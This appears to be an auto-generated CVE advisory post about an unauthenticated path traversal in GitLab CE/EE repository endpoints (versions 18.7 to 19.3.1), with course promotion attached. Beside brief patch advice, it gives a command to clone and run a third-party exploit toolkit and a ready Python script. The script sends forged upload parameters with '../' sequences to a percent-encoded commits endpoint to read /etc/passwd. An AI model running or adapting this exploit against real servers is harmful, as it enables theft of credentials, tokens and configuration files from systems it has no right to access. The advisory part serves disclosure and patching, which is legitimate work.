Listen to this Post
CVE-2026-85706 is a critical path traversal vulnerability in GitLab CE and EE repository commits and files endpoints. It stems from improper path confinement combined with missing authentication enforcement, allowing unauthenticated attackers to read arbitrary files from the server. By utilizing specific request routing anomalies, percent-encoded static segments, and forged upload metadata query parameters, an external attacker can bypass authorization checks, force the backend application handler to parse local system files, and leak sensitive configuration details or secrets.
DailyCVE Form:
Platform: GitLab
Version: 18.7 to 19.3.1
Vulnerability : Path Traversal
Severity : Critical
date: September 10, 2026
Prediction: September 10, 2026
What Undercode Say
Bash Commands And Codes
git clone https://github.com/tc4dy/CVE-2026-85706-PoC-Toolkit cd CVE-2026-85706-PoC-Toolkit python3 exploit.py -u http://target-gitlab.local -f /etc/passwd
Exploit: (Educational Purposes!)
import requests
target = "http://target-gitlab.local"
endpoint = "/api/v4/projects/1/repository/%63ommits"
params = {
"file": "",
"file.path": "../../../../../etc/passwd",
"file.size": "1",
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(target + endpoint, params=params, headers=headers)
print(response.text)
Protection: from this CVE
Upgrade GitLab self-managed instances immediately to fixed versions 19.1.8, 19.2.6, 19.3.2 or later.
Impact:
Unauthenticated remote attackers can extract sensitive environment variables, tokens, credentials, and system configuration files.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

